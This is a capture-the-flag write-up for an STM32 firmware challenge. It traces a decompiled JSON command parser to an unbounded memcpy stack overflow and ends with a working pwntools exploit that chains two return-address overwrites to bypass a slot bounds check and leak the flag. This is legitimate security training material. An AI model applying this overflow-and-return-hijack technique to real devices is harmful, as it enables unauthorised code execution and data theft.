Last year many brave agents showed the world what they could do against PALINDROME’s custom TPM chips. Their actions sent chills down the spines of all those who seek to do us harm. This year, we managed to exfiltrate an entire STM32-based system and its firmware from within SPECTRE. You can perform your attack on a live STM32 module hosted behind enemy lines: nc chals.tisc25.ctf.sg 51728. Attached files: HWisntThatHard_v2.tar.xz

This hardware challenge is a sequel to last year’s TISC level 5. The challenge archive file includes the firmware file, the flash memory file and an emulator. The emulator allows us to run the firmware file with the supplied flash memory, simulating the remote challenge environment locally.

Running the emulator, we can interact with the firmware.

$ ./stm32-emulator config.yaml
hi
Unknown command, expected read slot or check slot with data

Let’s reverse engineer the firmware to figure out how to send it commands. Throwing the firmware at an IDA MCP server gives a pretty nice decompilation, and throwing that decompilation into ChatGPT gives a pretty nice explanation of the command format:

Read operation:
{"slot": <unsigned integer>[optional exponent]}

Check operation:
{"slot": <unsigned integer>[optional exponent], "data": null | <payload>}
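The two command shapes above can be built programmatically. This is a minimal sketch, not part of the original solve: the helper names `read_cmd` and `check_cmd` are hypothetical, and it assumes the firmware's parser tolerates the spacing that `json.dumps` emits by default.

```python
import json


def read_cmd(slot: int) -> bytes:
    """Build a read command: {"slot": <n>}."""
    return json.dumps({"slot": slot}).encode("ascii")


def check_cmd(slot: int, data: bytes) -> bytes:
    """Build a check command whose payload is a JSON array of byte values."""
    return json.dumps({"slot": slot, "data": list(data)}).encode("ascii")


if __name__ == "__main__":
    print(read_cmd(1).decode())
    print(check_cmd(1, b"TISC{").decode())
```

Each command would be sent to the emulator or the remote service as a single line.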

For reference, here are the important bits of the actual decompilation:

    // It’s a single-object streaming parser for a UART command that looks like:
    // {"slot": <unsigned integer>[optional exponent], "data": null | <payload>}
    parse_slot_data_cmd((int)&slot_number, &cmd_buffer);// Parse received command
    if ( is_slot_cmd )
    {
      curr_slot = slot_number;                  // Process slot read/check command
      if ( (unsigned int)(slot_number - 1) <= 0xE )
      {
        memory_set(spi_mem_buf, 0, 32);         // Read data from slot in SPI flash
        flash_cmd[0] = 3;
        flash_cmd[1] = __rev16(32 * curr_slot);
        toggle_spi_cs(1073872896, 0x8000, 0);
        spi_flash_write(&spi_base_address, flash_cmd, 4, 0xFFFFFFFF);
        spi_flash_read(&spi_base_address, (int)spi_mem_buf, 32, 0xFFFFFFFF);
        toggle_spi_cs(1073872896, 0x8000, 1);
        if ( is_check_cmd )
        {
          process_command_result(spi_mem_buf, b);// Process data check operation
          if ( *(_DWORD *)b )
            free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
        }
        else
        {
          string_append(uart_buffer, (int)"Slot ", 5);// Format and output slot contents
          appended = append_int_to_string(uart_buffer, curr_slot);
          string_append(appended, (int)" contains: [", 12);
          p_slot_data_start = &slot_data_start;
          while ( 1 )
          {
            v22 = (unsigned __int8)*++p_slot_data_start;
            append_int_to_string(uart_buffer, v22);
            if ( p_slot_data_start == &slot_data_end )
              break;
            string_append(uart_buffer, (int)",", 1);
          }

Let’s try it!

{"slot": 0}
Out of bounds!
{"slot": 1}
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot":15}
Slot 15 contains: [67,82,69,68,123,82,66,95,65,78,68,95,74,70,95,87,69,82,69,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot":16}
Out of bounds!
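The slot contents come back as a list of decimal byte values, so a small decoder makes the responses readable. This is a sketch under the assumption that every read response follows the `Slot N contains: [...]` format shown above; `decode_slot_line` is a hypothetical helper name.

```python
import re


def decode_slot_line(line: str) -> str:
    """Turn 'Slot N contains: [84,73,...]' into the ASCII string it encodes."""
    match = re.search(r"contains: \[([0-9,\s]*)\]", line)
    if match is None:
        raise ValueError("not a slot read response")
    values = [int(v) for v in match.group(1).split(",") if v.strip()]
    # Slots are zero-padded to 32 bytes, so drop the trailing NULs.
    return bytes(values).rstrip(b"\x00").decode("ascii", errors="replace")


if __name__ == "__main__":
    line = ("Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,"
            "71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]")
    print(decode_slot_line(line))
```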

The read operation allows us to read the data stored in the specified slot. These slots correspond to offsets in SPI flash memory: each slot is 0x20 bytes long, so slot n starts at byte offset 0x20 * n from the start of the flash.

$ xxd ext-flash.bin | head
00000000: 5449 5343 7b52 4541 4c5f 464c 4147 5f47  TISC{REAL_FLAG_G
00000010: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000020: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000030: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000040: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000050: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000060: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000070: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000080: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000090: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
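The slot-to-offset mapping follows from the `32 * curr_slot` term in the decompilation and can be sketched as below. The helper names are hypothetical, and the flash image here is synthetic filler rather than the real `ext-flash.bin`.

```python
SLOT_SIZE = 0x20  # bytes per slot, from `32 * curr_slot` in the decompilation


def slot_offset(slot: int) -> int:
    """Byte offset of a slot from the start of the flash image."""
    return slot * SLOT_SIZE


def read_slot(flash: bytes, slot: int) -> bytes:
    """Return the 32 bytes that a read of `slot` would fetch."""
    start = slot_offset(slot)
    return flash[start:start + SLOT_SIZE]


if __name__ == "__main__":
    # Synthetic 16-slot image: slot i is filled with the byte value i.
    flash = b"".join(bytes([i]) * SLOT_SIZE for i in range(16))
    print(hex(slot_offset(1)), read_slot(flash, 1)[:4])
```

To try it on the real image, the synthetic `flash` could be replaced with `open("ext-flash.bin", "rb").read()`; slot 0 would then be the region that holds the real flag.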

The real flag is at offset 0, so we want to read slot 0. However, slot 0 is rejected because it fails the check (unsigned int)(slot_number - 1) <= 0xE: 0 - 1 wraps around to 0xFFFFFFFF as an unsigned int, which is far greater than 0xE.
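The bounds check can be modelled in Python by masking to 32 bits to imitate the unsigned cast. This is only a sketch of the single comparison shown in the decompilation; `slot_in_bounds` is a hypothetical name.

```python
def slot_in_bounds(slot: int) -> bool:
    """Model of `(unsigned int)(slot_number - 1) <= 0xE` on a 32-bit target."""
    return ((slot - 1) & 0xFFFFFFFF) <= 0xE


if __name__ == "__main__":
    for slot in (0, 1, 15, 16):
        print(slot, slot_in_bounds(slot))
```

The single unsigned comparison accepts exactly slots 1 through 15 and rejects both 0 and anything from 16 upwards.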

Other than reading from a slot, we can check slot data with the other command. By specifying a data byte array, the firmware returns the number of bytes that match the actual data.

{"slot": 1}
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot": 1, "data":[84,73,83,67,123]}
Checking...
Result: 6
{"slot": 1, "data":[41,41,41,41,41]}
Checking...
Result: 1

The result is off by one (five matching bytes report 6, zero matching bytes report 1), but that doesn’t matter for our purposes.

Firmware challenges are usually either rev or pwn challenges. Since there doesn’t appear to be any hidden functionality in the firmware, we should start looking for vulnerabilities. Based on the syntax of the two commands, it’s quite likely that the vulnerability is in the more complex check operation. Given that we can supply an arbitrarily sized array, a buffer overflow immediately comes to mind.

Looking back at the decompilation, the input command is parsed. If it is a check operation, process_command_result() is called.

if ( is_check_cmd )
{
  process_command_result(spi_mem_buf, b);// Process data check operation
  if ( *(_DWORD *)b )
    free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
}

This is a helper function that calls get_check_result(), formats the output and sends it to UART.

int process_command_result(char *a, char *b)
{
  int v2; // r5
  _DWORD *appended; // r0
  int (__fastcall *v4)(int, int); // r2
  _BYTE *v5; // r6
  _DWORD *v6; // r4
  int v7; // r1
  _DWORD *v8; // r0
  int v9; // r1
  int (__fastcall *v11)(int, int); // r3

  v2 = get_check_result((int)a, (char **)b);
  string_append(uart_buffer, (int)"Result: ", 8);
  appended = append_int_to_string(uart_buffer, v2);
  v5 = *(_BYTE **)((char *)appended + *(_DWORD *)(*appended - 12) + 124);
  if ( !v5 )
    handle_string_error((int)appended);
  v6 = appended;
  if ( v5[28] )
  {
    v7 = (unsigned __int8)v5[39];
  }
  else
  {
    prepare_string_for_output(v5);
    v4 = default_string_handler;
    v11 = *(int (__fastcall **)(int, int))(*(_DWORD *)v5 + 24);
    v7 = 10;
    if ( v11 != default_string_handler )
      v7 = v11((int)v5, 10);
  }
  v8 = finalize_string(v6, v7, (int)v4);
  uart_send_string(v8, v9);
  return v2;
}

get_check_result() is a thunk function that wraps check_slot_pattern(), which is where we find the vulnerability.

int __fastcall get_check_result(int a1, char **a2)
{
  return check_slot_pattern(a1, a2);
}

int __fastcall check_slot_pattern(int mem_ptr, char **str_input)
{
  int matches; // r5
  int other_ptr; // r0
  char *buf_ptr; // r3
  int char1_; // r1
  int char1; // t1
  int char2; // t1
  _DWORD *v9; // r0
  int (__fastcall *v10)(int, int); // r2
  _BYTE *v11; // r4
  int v12; // r1
  _DWORD *v13; // r0
  int v14; // r1
  int (__fastcall *v16)(int, int); // r3
  char buffer_pre; // [sp+0h] [bp-31h] BYREF
  int buffer; // [sp+1h] [bp-30h] BYREF
  char buffer_end; // [sp+20h] [bp-11h] BYREF

  memory_copy((int)&buffer, *str_input, str_input[1] - *str_input);// OOB memcpy
  // [...]

There is an unbounded memory copy of the supplied data bytes into a stack buffer. Although the firmware is ARM, stack overflow exploitation remains similar to x86: we can use the overflow to overwrite the saved return address as well as stack variables. Looking back at the decompilation:

    // It’s a single-object streaming parser for a UART command that looks like:
    // {"slot": <unsigned integer>[optional exponent], "data": null | <payload>}
    parse_slot_data_cmd((int)&slot_number, &cmd_buffer);// Parse received command
    if ( is_slot_cmd )
    {
      curr_slot = slot_number;                  // Process slot read/check command
      if ( (unsigned int)(slot_number - 1) <= 0xE )
      {
        memory_set(spi_mem_buf, 0, 32);         // Read data from slot in SPI flash
        flash_cmd[0] = 3;
        flash_cmd[1] = __rev16(32 * curr_slot);
        toggle_spi_cs(1073872896, 0x8000, 0);
        spi_flash_write(&spi_base_address, flash_cmd, 4, 0xFFFFFFFF);
        spi_flash_read(&spi_base_address, (int)spi_mem_buf, 32, 0xFFFFFFFF);
        toggle_spi_cs(1073872896, 0x8000, 1);
        if ( is_check_cmd )
        {
          process_command_result(spi_mem_buf, b);// Process data check operation
          if ( *(_DWORD *)b )
            free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
        }

We want to redirect execution to somewhere after the slot_number check, with curr_slot equal to zero. These constraints are quite easy to satisfy, so we don’t have to craft the ROP chain too carefully.

Recall that the call chain is main() -> process_command_result() -> get_check_result() -> check_slot_pattern(). To keep things simple, we should properly unwind the stack before returning to main(). So, I first hijacked the return address of check_slot_pattern() so that it returns into the function epilogue of process_command_result() (we can ignore get_check_result() because it’s a thunk function). That epilogue pops the next values off our payload, which lets us hijack the return of process_command_result() as well and send it to an instruction after the slot_number check in main(). The remainder of the payload is zero bytes, which overwrite the stack variables in main() and should zero out curr_slot.

After trying a few different main() instruction addresses, we find one that works.

from pwn import *
import time

context.log_level = "debug"
p = remote("chals.tisc25.ctf.sg", 51728)
time.sleep(0.5)

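def bof(payload: bytes):
    # Encode the raw bytes as a JSON array of integers, e.g. "[65, 65, ...]".
    payload = str(list(payload))
    # Any in-bounds slot (1 to 15) works here; it only has to reach the check path.
    p.sendline(f'{{"slot": 1, "data": {payload}}}'.encode("ascii"))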

payload = b"A" * 0x20
payload += b"B" * 4  # alignment
payload += b"C" * 4  # r4
payload += b"D" * 4  # r5
payload += p32(0x8000278 | 1)  # pc (epilogue)

payload += p32(0)
payload += p32(0)
payload += p32(0)
payload += p32(0x8007B1E | 1)  # pc (after check)
payload += p32(0) * 100  # overwrite stack vars

bof(payload)

p.interactive()
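The payload layout can be double-checked without pwntools. The sketch below rebuilds the same bytes with `struct` and prints where each overwritten return address lands. The addresses and padding sizes are taken from the script above; the helper names `p32` and `thumb` are local stand-ins, not the pwntools functions. The `| 1` sets bit 0 of the branch target, which on Cortex-M cores marks the destination as Thumb code.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word, like pwntools' p32 with default context."""
    return struct.pack("<I", value)


def thumb(addr: int) -> int:
    """Set bit 0 so the core stays in Thumb state when this value is loaded into pc."""
    return addr | 1


# Stage 1: fill the buffer, then the saved registers popped by check_slot_pattern().
stage1 = b"A" * 0x20 + b"B" * 4 + b"C" * 4 + b"D" * 4
stage1 += p32(thumb(0x8000278))  # pc: epilogue of process_command_result()

# Stage 2: three words consumed by that epilogue, then the second return address.
stage2 = p32(0) * 3 + p32(thumb(0x8007B1E))  # pc: after the slot check in main()

# Tail: zeros intended to clear main()'s stack variables, including curr_slot.
payload = stage1 + stage2 + p32(0) * 100

if __name__ == "__main__":
    print("first pc at offset", len(stage1) - 4)
    print("second pc at offset", len(stage1) + len(stage2) - 4)
    print("total length", len(payload))
```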

Flag: TISC{3mul4t3d_uC_pwn3d}